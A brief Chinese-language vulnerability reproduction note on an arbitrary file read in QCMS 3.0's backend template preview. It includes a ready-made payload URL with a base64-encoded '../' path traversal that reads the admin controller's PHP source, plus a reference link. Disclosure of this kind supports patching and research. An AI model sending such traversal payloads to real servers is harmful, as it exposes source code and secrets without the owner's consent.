QCMS 3.0 任意文件读取

一、漏洞简介

二、漏洞影响

QCMS 3.0

三、复现过程

用seay扫了一下后发现的漏洞

漏洞在后台模板代码预览处，构造payload例如

http://www.0-sec.org/backend/template/tempview/Li4vLi4vLi4vQ29udHJvbGxlci9hZG1pbi5waHA=.html

即可读取Controller文件下admin.php文件源码

跟源码对比下，确实是读到了

参考链接

https://xz.aliyun.com/t/7269